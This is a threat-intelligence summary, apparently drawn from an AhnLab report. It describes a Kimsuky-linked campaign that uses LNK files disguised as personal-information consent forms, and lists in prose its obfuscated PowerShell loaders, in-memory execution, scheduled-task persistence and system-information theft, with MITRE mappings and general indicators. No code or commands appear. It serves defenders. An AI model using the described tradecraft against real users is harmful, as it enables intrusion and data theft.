Malicious LNK files disguised as “Consent Forms for the Collection and Use of Personal Information” are being used to trick users into launching obfuscated PowerShell that downloads and runs additional payloads in memory. The campaign creates persistence through Windows Task Scheduler, drops decoy documents, and collects system details such as IP addresses and security product information, with behavior linked to the Kimsuky group. #LNK #PowerShell #WindowsTaskScheduler #Kimsuky
Keypoints
- Attackers distribute malicious files disguised as ordinary work documents to lure users into opening them.
- The files are actually LNK shortcut files that launch obfuscated PowerShell commands when executed.
- Additional PowerShell scripts are downloaded from external sources and executed using a fileless, in-memory method.
- The threat actor repeatedly modified external scripts, but all variants followed the same decrypt-and-execute pattern.
- Persistence is established by registering a Windows Task Scheduler task to keep the loader running after reboot.
- The malware drops a legitimate-looking decoy document and deletes the original LNK file to hide evidence.
- Collected information includes security products, OS details, network settings, IP addresses, drive information, modified files, and running processes; the activity shows similarities to the Kimsuky group.
MITRE Techniques
- [T1204.002 ] User Execution: Malicious File – The attack relies on the victim opening a file disguised as a normal document (‘사용자가 파일을 실행하면’).
- [T1059.001 ] Command and Scripting Interpreter: PowerShell – Obfuscated PowerShell is used to execute malicious code (‘난독화된 PowerShell 스크립트’).
- [T1105 ] Ingress Tool Transfer – The LNK-triggered script downloads additional malicious PowerShell from an external source (‘외부 소스에서 추가 악성 PowerShell 스크립트를 다운로드’).
- [T1027 ] Obfuscated Files or Information – The scripts contain obfuscated and encrypted PowerShell code to hinder analysis (‘암호화된 난독화 PowerShell 코드를 복호화하여 실행’).
- [T1053.005 ] Scheduled Task/Job: Scheduled Task – A Windows Task Scheduler task is registered to repeatedly run the loader and maintain persistence (‘작업 스케줄러에 작업을 등록’).
- [T1112 ] Modify Registry – Not mentioned in the article; no registry modification evidence is described.
- [T1074 ] Data Staged – The malware collects and prepares system information from the infected PC (‘정보를 수집’).
- [T1016 ] System Network Configuration Discovery – The information theft script gathers network settings and IP addresses (‘네트워크 설정, IP 주소’).
- [T1082 ] System Information Discovery – The script collects OS and drive information to assess the victim environment (‘운영체제, 드라이브 정보’).
- [T1005 ] Data from Local System – The script gathers recently modified files and running processes from the local machine (‘최근 수정된 파일, 실행 중인 프로세스’).
- [T1106 ] Native API – The backdoor loader decrypts embedded executable data and loads it into memory (‘내장된 실행 파일 데이터를 복호화하여 메모리에 로드’).
- [T1218.011 ] System Binary Proxy Execution: Rundll32 – The article mentions executing DLLs, but does not specify rundll32; no exact technique is confirmed.
Indicators of Compromise
- [File names ] disguised lure files and decoy content – “Consent Forms for the Collection and Use of Personal Information” and a legitimate-looking decoy document
- [File extensions / file types ] malicious shortcut files and PowerShell scripts – .LNK files, additional PowerShell scripts
- [Execution artifacts ] persistence and created items – Windows Task Scheduler entries, additional scripts created in user account paths
- [External sources / web service references ] payload delivery locations – an external source, a legitimate web service used to store encoded data
- [Behavioral IOC ] fileless execution and in-memory loading – PowerShell code executed in memory without saving to disk
Read more: https://asec.ahnlab.com/en/94164/